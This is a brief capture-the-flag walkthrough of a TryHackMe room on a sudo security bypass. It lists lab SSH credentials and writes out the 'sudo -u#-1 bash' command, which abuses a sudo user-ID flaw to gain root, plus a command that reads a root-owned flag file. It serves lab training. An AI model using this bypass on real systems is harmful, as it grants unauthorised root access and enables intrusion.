Tryhackme: Sudo Security Bypass Walkthrough
Oct 6, 2023
The room can be accessed using this link: https://tryhackme.com/room/sudovulnsbypass
Task 1 : Deploy!
SSH into that machine you deployed, using port 2222.
The credentials are:
Username: tryhackme
Password: tryhackme
# ssh -p 2222 tryhackme@MACHINE_IP
tryhackme@MACHINE_IP’s password:
Task 2 : Security Bypass
Hint :- Try using: sudo -l to see your privileges.
What command are you allowed to run with sudo?
Ans: /bin/bash
Hint : Get root using sudo (as a user with UID -1) with the command you found in the last question, then use cat /root/root.txt to get the flag.
$ sudo -u#-1 bash
# sudo -u#-1 whoami
# cat /root/root.txt
What is the flag in /root/root.txt?
Ans: THM{****_********_******}
